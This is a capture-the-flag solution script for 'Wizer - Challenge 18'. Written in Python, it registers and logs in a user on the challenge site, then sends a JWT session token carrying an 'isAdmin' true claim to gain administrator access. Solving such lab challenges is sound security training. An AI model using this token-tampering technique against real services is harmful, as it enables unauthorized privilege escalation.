Wizer - Challenge 18

Exploit

import requests

url = "https://chal18.vercel.app"


r = requests.post(url + "/register", json={
    "username":"pelele",
    "password":"pelele"
})


r = requests.post(url + "/login", json={
    "username":"pelele",
    "password":"pelele"
})

print(r.text)


r = requests.post(url + "/profile", json={
    "session": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InBlbGVsZSIsImlhdCI6MTc1MDg4Mjk2MCwiZXhwIjoxNzUwODg2NTYwLCJpc0FkbWluIjp0cnVlfQ.CQdc1jD1ftFpVRlWxApPkmo_vWdg5Xo3RaMldltNqkg"
})

print(r.text)